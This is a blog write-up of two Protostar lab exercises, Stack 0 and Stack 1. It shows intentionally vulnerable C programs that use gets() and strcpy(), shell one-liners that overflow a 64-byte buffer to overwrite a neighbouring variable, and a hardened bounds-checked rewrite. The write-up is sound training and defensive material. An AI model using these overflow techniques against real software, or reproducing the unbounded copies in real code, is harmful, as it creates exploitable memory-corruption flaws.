paulwalko.github.io/_posts/2016-06-14-nebula_exploit_e...

---
title: Protostar Exploit Exercises Solutions 0-1
layout: post
category: writeup
tags: [exploit-exercises, protostar, hacking]
excerpt: Walkthrough for Protostar exercises on exploit-exercises.com
---

Stack 0

Here's what we're given:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

int main(int argc, char **argv)
{
  volatile int modified;   /* sits next to buffer on the stack */
  char buffer[64];

  modified = 0;
  gets(buffer);            /* no bounds check: anything past 64 bytes overwrites what follows buffer */

  if(modified != 0) {
      printf("you have changed the 'modified' variable\n");
  } else {
      printf("Try again?\n");
  }
}

The first thing I took note of is the size of the buffer: 64 bytes. After that, the program reads a line into buffer with gets(), which never checks how much it writes, and then checks whether the modified variable is still 0. I'm guessing that if I put in a string longer than 64 bytes it will spill over into modified and it will work. Let's see:

$ echo `python -c 'print "A"*64'` | ./stack0
Try again?

That works as expected, now with 65 bytes:

$ echo `python -c 'print "A"*65'` | ./stack0
you have changed the 'modified' variable

Solved!

Stack 1

Here's the code we're given:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
#include <err.h>         /* for errx(); missing from the handout, needed to compile */

int main(int argc, char **argv)
{
  volatile int modified;   /* sits next to buffer on the stack */
  char buffer[64];

  if(argc == 1) {
      errx(1, "please specify an argument\n");
  }

  modified = 0;
  strcpy(buffer, argv[1]); /* no length check: copies the whole argument regardless of buffer size */

  if(modified == 0x61626364) {
      printf("you have correctly got the variable to the right value\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);
  }
}

Just like Stack 0, we're given a 64-byte buffer and we're asked to fill it, except this time the input comes from the first command-line argument via strcpy() instead of from stdin, and modified has to equal 0x61626364 instead of just being changed like before.

Keep in mind this is little endian, so I'll input the value in reverse order (0x61626364 is the bytes 'a' 'b' 'c' 'd', so they have to go in as "dcba"):

$ ./stack1 `python -c 'print "A"*64'`
Try again, you got 0x00000000

That works as expected, now with the additional bytes:

$ ./stack1 `python -c 'print "A"*64 + "\x64\x63\x62\x61"'`
you have correctly got the variable to the right value

Woo!
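Both levels fall to the same defect: a copy that does not know the size of its destination. Below is an added example, not the exercise's or the author's code, showing hardened rewrites of stack0 and stack1 where every copy is bounded by sizeof buffer and over-long input is rejected, so it can never reach modified; the function names, the tmpfile()-based test helper and the return convention are this example's own assumptions.

```c
/* Hardened rewrites of stack0 and stack1 (added example, not the exercise's
 * or the author's code). The originals copy input with functions that do not
 * know the destination size (gets(), strcpy()); here every copy is bounded by
 * sizeof buffer and over-long input is rejected, so it cannot reach the
 * neighbouring 'modified'. Return convention (this example's own): the final
 * value of modified, or -1 when the input was rejected. */
#include <stdio.h>
#include <string.h>

/* stack0 fixed: fgets() stops after sizeof buffer - 1 characters. A line that
 * did not fit has no '\n'; drain and reject it rather than silently truncate. */
int stack0_fixed(FILE *in)
{
    volatile int modified = 0;
    char buffer[64];
    int c;
    if (fgets(buffer, sizeof buffer, in) == NULL)
        return -1;                               /* nothing read */
    if (strchr(buffer, '\n') == NULL && !feof(in)) {
        while ((c = getc(in)) != EOF && c != '\n')
            ;                                    /* discard the rest */
        return -1;                               /* too long: rejected */
    }
    return modified;
}

/* stack1 fixed: measure first; strcpy() runs only if the string and its
 * terminator fit in the buffer. */
int stack1_fixed(const char *arg)
{
    volatile int modified = 0;
    char buffer[64];
    if (arg == NULL || strlen(arg) >= sizeof buffer)
        return -1;                               /* would overflow: refuse */
    strcpy(buffer, arg);                         /* safe: bounded by the check */
    return modified;
}

/* Convenience for testing: run stack0_fixed() over a string via tmpfile(). */
int stack0_fixed_str(const char *line)
{
    FILE *f = tmpfile();
    int r = -2;                                  /* -2: could not stage input */
    if (f == NULL) return r;
    if (fputs(line, f) != EOF) { rewind(f); r = stack0_fixed(f); }
    fclose(f);
    return r;
}
```

With the page's own payloads (64 'A's for stack0, 64 'A's plus "dcba" for stack1) both fixed functions return -1 and modified stays 0.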